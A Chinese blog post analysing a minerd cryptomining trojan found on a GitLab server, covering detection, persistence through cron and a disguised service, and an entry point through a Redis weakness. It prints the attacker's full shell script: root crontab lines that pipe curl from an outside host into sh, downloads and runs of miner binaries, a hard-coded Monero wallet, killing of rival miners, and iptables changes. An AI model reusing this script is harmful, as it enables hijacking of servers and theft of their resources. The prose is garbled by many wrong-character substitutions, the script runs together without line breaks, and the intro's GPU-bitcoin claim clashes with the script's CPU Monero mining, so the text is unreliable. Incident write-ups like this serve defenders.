挖矿程序minerd入侵分析和解决办法

如今比特币的价格涨得很高，因此如今有黑客专门制造挖矿木马来诱导网友，从而达到控制电脑上的显卡来挖掘比特币。为何木马要控制电脑中的显卡呢？由于显卡挖掘虚拟货币比特币的效率远比 CPU 要高。若是你是一位 3D 游戏玩家，正好中了比特币挖矿木马，就会发如今玩游戏时会很是卡顿。

那么，跟咱们今天提到的挖矿minerd进程又有何关系呢？

发现问题

　　最近一台安装了Gitlab的服务器发生了高负载告警，Cpu使用状况以下：

　　

　　让后登陆到服务器，利用top查看CPU使用状况，这个叫minerd的程序消耗cpu较大，以下图所示：

　　

　　这个程序并非咱们的正常服务程序，内心一想确定被黑了，而后就搜索了一下这个程序，果然就是个挖矿木马程序，既然已经知道他是木马程序，那就看看它是怎么工做的，而后怎么修复一下后门。

　　这个程序放在/opt/minerd下，在肯定跟项目不相关的状况下判断是个木马程序，果断kill掉进程，而后删除/opt下minerd文件。

　　

　　本想这样能够解决，谁想不到15秒时间，又自动启动起来，并且文件又自动建立，这个让我想起了crontab的定时器，果真运一查确实crond存在一条：，果断删除处理。再杀进程，再删文件；然并卵，依旧起来；

　　

　　既然没用我继续google，在stackexchange找到以下解决方案：

　　

　　各类文件删除都不起做用，原来该木马程序注册了一个“lady”的服务，并且仍是开机启动，起一个这个可爱的名字，谁TMD知道这是一个木马， 这个假装程序也多是ntp，能够参考：http://53cto.blog.51cto.com/9899631/1826989。

　　这下完美解决了，可是得分析一下缘由，shell启动脚本：

　　export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbinecho "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105008 | sh" > /var/spool/cron/rootmkdir -p /var/spool/cron/crontabsecho "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105008 | sh" > /var/spool/cron/crontabs/rootif [! -f "/tmp/ddg.217" ]; then curl -fsSL http://www.haveabitchin.com/ddg.$(uname -m) -o /tmp/ddg.217fichmod +x /tmp/ddg.217 && /tmp/ddg.217killall /tmp/ddg.216if [-d "/opt/yam" ]; then rm -rf /opt/yamfips auxf|grep -v grep|grep /tmp/duckduckgo|awk '{print $2}'|xargs kill -9ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9ps auxf|grep -v grep|grep "/usr/sbin/ntp"|awk '{print $2}'|xargs kill -9ps auxf|grep -v grep|grep "/opt/minerd"|awk '{print $2}'|xargs kill -9ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9#/opt/minerd -h#if [$? != "0" ]; then #ps auxf|grep -v grep|grep "/opt/minerd" #if [$? != "0" ]; then #if [! -f /opt/yam ]; then #curl -fsSL http://www.haveabitchin.com/yam -o /opt/yam #fi #chmod +x /opt/yam && /opt/yam -c x -M stratum+tcp://4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC:x@xmr.crypto-pool.fr:443/xmr #fi#fiDoMiner(){ if [! -f "/tmp/AnXqV" ]; then curl -fsSL http://www.haveabitchin.com/minerd -o /tmp/AnXqV fi chmod +x /tmp/AnXqV /tmp/AnXqV -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC -p x}ps auxf|grep -v grep|grep "4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC" || DoMinerDoRedis6379(){ iptables -F REDIS6379 iptables -A REDIS6379 -p tcp -s 127.0.0.1 --dport 6379 -j ACCEPT #iptables -A REDIS6379 -s 0.0.0.0/8 -p tcp --dport 6379 -j ACCEPT #iptables -A REDIS6379 -s 10.0.0.0/8 -p tcp --dport 6379 -j ACCEPT #iptables -A REDIS6379 -s 169.254.0.0/16 -p tcp --dport 6379 -j ACCEPT #iptables -A REDIS6379 -s 172.16.0.0/12 -p tcp --dport 6379 -j ACCEPT #iptables -A REDIS6379 -s 192.168.0.0/16 -p tcp --dport 6379 -j ACCEPT #iptables -A REDIS6379 -s 224.0.0.0/4 -p tcp --dport 6379 -j ACCEPT iptables -A REDIS6379 -p TCP --dport 6379 -j REJECT iptables -I INPUT -j REDIS6379}iptables -D OUTPUT -j REDIS6379iptables -F REDIS6379iptables -X REDIS6379iptables -D INPUT -j REDIS63792iptables -F REDIS63792iptables -X REDIS63792#iptables -N REDIS6379 && DoRedis6379

　　解决minerd并非最终的目的，主要是要查找问题根源，个人服务器问题出在了redis服务了，黑客利用了redis的一个漏洞得到了服务器的访问权限。

　　商业模式

　　被植入比特币“挖矿木马”的电脑，系统性能会受到较大影响，电脑操做会明显卡慢、散热风扇狂转；另外一个危害在于，“挖矿木马”会大量耗电，并形成显卡、ＣＰＵ等硬件急剧损耗。比特币具备匿名属性，其交易过程是不可逆的，被盗后根本没法查询是被谁盗取，流向哪里，所以也成为黑客的重点窃取对象。

　　攻击&防护

　　植入方式：安全防御策略薄弱，利用Jenkins、Redis等中间件的漏洞发起攻击，得到root权限。

　　最好的防护可能仍是作好防御策略、严密监控服务器资源消耗（CPU／load）。

　　这种木马很容易变种，不少状况杀毒软件未必可以识别。